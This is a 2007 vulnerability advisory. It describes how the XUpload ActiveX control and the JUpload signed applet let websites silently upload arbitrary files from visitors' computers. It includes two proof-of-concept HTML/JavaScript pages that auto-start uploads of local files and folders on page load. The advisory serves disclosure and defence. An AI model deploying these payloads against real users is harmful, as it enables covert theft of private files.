XUpload/JUpload arbitrary file upload


Yorick Koster, June 2007

Abstract


XUpload and JUpload allow attackers to upload arbitrary files from user's systems. This allows attackers to potentially gain access to sensitive information.

Fix


There is currently no fix available. As of XUpload version 3.0, XUpload will display a warning message to end user when a website tries to upload files from the user's system.

Introduction


The XUpload ActiveX control is a client-side component the can be loaded in Internet Explorer. XUpload is used to upload arbitrary files to a web server. It is used to overcome some of the limitations that exist when the regular upload functionality of the browser is used (<input type="file" ...). XUpload allows uploading multiple files and even recursively entire directories. XUpload is marked "Safe for scripting" and "Safe for initialization".

JUpload is the Java equivalent of XUPload. Since XUpload is an ActiveX control, XUpload only works in Internet Explorer. JUpload is implemented as a Java applet and thus works in any browser that supports and has installed a Java plugin. JUpload is a signed applet, this is required as applet normally run in a very restricted sandbox. As JUpload needs to access local files, JUpload is signed. This will cause JUpload to run in a less restrictive sandbox. Before JUpload is started, user's are required to accept the applet. In Sun's Java implementation the option "Always trust content from this publisher" check box is checked by default. If the user chooses "Run" with this option checked, the JVM will not warn the user about signed applets that are signed by Persist.

XUpload, arbitrary file upload


Normally, a user selects the files the user wants to upload. Next, the user can initiate the file upload by right clicking in XUpload. Doing so will display a context menu, containing an "Upload" option. The upload is started by clicking on this option.

/advisory/AK20070602/001_initiate_file_upload_context_menu.png
Figure 1: Initiate file upload through context menu

Web site developers can also automatically initiate an upload using the Upload() method. Using the AddFile(Path As String) and AddFolder(Folder As String, Optional Recursive = False) methods or the FileN parameter, it is also possible to automatically select files and/or folders that need to be uploaded. The Server and Script parameters determine the target to which the files are uploaded. Using these methods, it is possible to upload any file to any server without any user interaction. Proof of concept:

<object width="0" height="0" id="XUpload" name="XUpload"
   classid="CLSID:E87F6C8E-16C0-11D3-BEF7-009027438003" codebase="XUpload.ocx">
<param name="Server" value="localhost">
<param name="Script" value="upload.php">
<param name="ViewServerReply" value="True">
<param name="File1" value="C:\WINDOWS\ie7.log">
</object>
<script type="text/javascript">
function StartUpload()
{
   document.XUpload.RemoveAll();
   document.XUpload.AddFile('C:\\WINDOWS\\ie7.log');
   document.XUpload.AddFolder('C:\\Documents and Settings\\All Users\\Desktop');
   document.XUpload.Upload();
}
window.onload = StartUpload;
</script>


Recent versions of XUpload will display a warning to the end user. It appears that the URL is not displayed correctly when the URL is to long for the reserved label. This functionality was added to XUpload version 3.0 (released August 10th, 2006).

"Improved security. A user is asked for a confirmation before the upload begins."

This warning may trigger security aware users and thus makes the upload functionality less useful for large scale attacks. The warning message contains a check box "Do not ask me again when uploading to this URL". If the target user checks this check box, the message box will not be displayed with future uploads. Using social engineering, it may be possible to convince the target user into checking this check box. XUpload saves a list of hashes in the Windows register of URLs that are trusted by the end user. Each hash represents a unique URL. In addition, this warning is only displayed to user that have a recent version of XUpload installed.

/advisory/AK20070602/002_file_upload_warning.png
Figure 2: XUpload ActiveX control file upload warning

JUpload, arbitrary file upload


JUpload offers similar functionality as XUpload. Because of this, it is also possible to upload arbitrary files to third party servers. A big difference with XUpload is the fact that JUpload does not display a warning to end users when it is instructed to upload files. Thus, files can be uploaded almost silently.

<applet id="JUpload" name="JUpload" width="0" height="0" archive="JUpload.jar" code="persits.transfer.gui.UploadUI.class">
<param name="cabbase" value="JUpload.cab">
<param name="UploadURL" value="upload.php">
<param name="DebugInformation" value="True">
<param name="File1" value="C:\Documents and Settings\All Users\ntuser.dat.LOG">
</applet>
<script type="text/javascript">
function waitForInit()
{
   if (document.JUpload.isInitialized())
   {
      document.JUpload.startTransfer();
   }
   else
   {
   window.setTimeout('waitForInit()', 200);
   }
}
   
waitForInit();
</script></body>